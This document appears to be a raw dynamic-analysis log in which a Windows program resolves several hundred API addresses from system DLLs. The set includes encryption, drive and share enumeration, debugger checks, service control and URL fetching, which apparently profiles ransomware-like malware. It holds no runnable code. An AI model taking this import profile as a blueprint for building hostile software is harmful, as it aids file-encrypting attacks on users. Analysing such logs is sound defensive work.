Get Address c:\windows\syswow64\kernel32.dll function = PrepareTape, address_out = 0x753ed232 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x75361222 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75361700 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumePathNameA, address_out = 0x753ebeed True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsBadWritePtr, address_out = 0x7538d1ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextVolumeMountPointA, address_out = 0x753ec189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x7536588e True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnlockFileEx, address_out = 0x7538d594 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x753634b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryExA, address_out = 0x753d9479 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x753613f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteTapemark, address_out = 0x753ed2d2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x7536418b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x753710b5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x7537ce46 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalDeleteAtom, address_out = 0x7537cdad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x753617b9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringA, address_out = 0x7538bc39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x7536192e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x75387aca True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x75379b0f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleA, address_out = 0x753612fc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x753e454f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x753649d7 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedExchange, address_out = 0x75361462 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x753634c8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x75364d40 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x753658a6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x7538d1c3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x7537d802 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75361809 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x7538772f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75364a5d True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x775fe026 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x753611c0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x753614c9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x753610ff True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x75367a10 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x75361282 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x753651b3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x753614b1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x75364950 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x753651cb True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x753651e3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x75365223 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x7536cb29 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x75363531 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x75360e00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x776045f5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x753611e0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x753649ad True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x753614fb True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x75363587 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x75361400 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x753611a9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x75361450 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x753617ec True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x75364a2d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapDestroy, address_out = 0x753635b7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x7536186e True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x75361725 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x7536110c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x753611f8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x753617d1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x7536170d True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x75407bff True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x75361328 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x775f22b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x775f2270 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x75365189 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x7536179c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x7538d1a1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x75364493 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x75361856 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77611f6e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77603002 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x7536e331 True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = IsValidSecurityDescriptor, address_out = 0x76f5b58c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetFileSecurityA, address_out = 0x76f919b8 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ImpersonateLoggedOnUser, address_out = 0x76f5c57a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ObjectCloseAuditAlarmW, address_out = 0x76f93389 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CreatePrivateObjectSecurity, address_out = 0x76f79a12 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AreAllAccessesGranted, address_out = 0x76f930a8 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetAclInformation, address_out = 0x76f5cc89 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AreAnyAccessesGranted, address_out = 0x76f930b8 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetMetaFileBitsEx, address_out = 0x76aa7121 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateDIBPatternBrushPt, address_out = 0x76aab6da True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetWindowExtEx, address_out = 0x76aa1ace True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetMetaFileBitsEx, address_out = 0x76aa6e71 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDeviceCaps, address_out = 0x76a94de0 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = AngleArc, address_out = 0x76ac4124 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDCBrushColor, address_out = 0x76ac232e True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = FlattenPath, address_out = 0x76ac555d True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetGraphicsMode, address_out = 0x76aa138a True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetDIBits, address_out = 0x76a97590 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CopyEnhMetaFileW, address_out = 0x76acd9dc True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = Chord, address_out = 0x76ac439f True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = PlayMetaFile, address_out = 0x76aab2b9 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgID, address_out = 0x75bf503c True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleUninitialize, address_out = 0x75beeba1 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleSetMenuDescriptor, address_out = 0x75c2dc53 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleLoadFromStream, address_out = 0x75bd6143 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleQueryCreateFromData, address_out = 0x75c532d4 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListA, address_out = 0x75f51c24 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x75e43c71 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetInstanceExplorer, address_out = 0x75e76399 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = Shell_NotifyIconA, address_out = 0x76078af2 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = DragAcceptFiles, address_out = 0x75f51bf1 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowsHookW, address_out = 0x754c8ca2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x75488bff True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = SetMessageQueue, address_out = 0x7549c8e7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSysColor, address_out = 0x75486c3c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BroadcastSystemMessageW, address_out = 0x754cc140 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x75491341 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = OpenDesktopA, address_out = 0x7549011a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetCapture, address_out = 0x754aed56 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MsgWaitForMultipleObjects, address_out = 0x75490b4a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefDlgProcW, address_out = 0x77634100 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DdeUnaccessData, address_out = 0x754d82f4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetClassInfoExW, address_out = 0x7548b238 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetScrollBarInfo, address_out = 0x75493ff8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharLowerA, address_out = 0x75493e75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75364f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75361252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75364208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x7536359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77610fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77609d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75365235 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x753879f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x7536435f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x75363519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x75361b00 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x759f3fc5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x75a2d918 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x759f1ee5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x759d1635 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x759cf48b True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x750f3058 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x750f2f06 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x750f2dd6 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x75d4ab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x75d59197 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x75d4b406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x75d55c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x75d730f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x75d5f18e True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x750b26e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x770345bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7705ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x77033248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7703bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7703a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7702d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x770381ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75364435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75365a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x7536103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x7537c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x75364259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x75361136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x75365371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x7537ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x75361986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x75365063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x7536492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x7538830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x75364620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x7538d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x75361072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x75363ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x75363f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x75382b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x753633a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75365929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x7538594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x753659e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x75379af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x75388baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x7536168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x7536183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x7538896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x7538828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x75364c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x753689b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x75362d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75383102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x75365444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x75382a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x7537cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x7537174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x75365558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x75364467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x753634d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x7538d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x7537ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x753e425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x7536495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x753834d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x7537f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x75364a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x7538d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x753e40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x753614e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x753654ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x7536dd0e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x75488a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x75489a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x754878e2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x75489abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x754888f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x75491361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x75487809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x7548b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x75490dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x75487136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x75489679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x75493559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x776025dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x754dfd1e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x754905ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x754dfd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x7548787b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x76f5df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x76f6369c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x76f6157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x76f5df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76f614d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76f6469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x76f5df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x76f77144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x76f6468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x76f5ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x76f5e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x76f5df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76f7779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x76f5c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x76f62a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76f646ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x75ebe141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75e49ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75e51e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76077078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x75ec17bf True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x75beb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75bf7259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x75c186d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75c19d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x76b53eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x76b53ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x76b55dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x76b54af8 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x76b53e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x76b53f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x76b54642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x76b5fd6b True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x75099263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x76b1311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x76b27673 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x76b1b131 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x7503436b True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x7504572c True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x751d5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x74f8c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75364d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x753e410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x753e4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x7536d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x7537ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x7537f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Fn
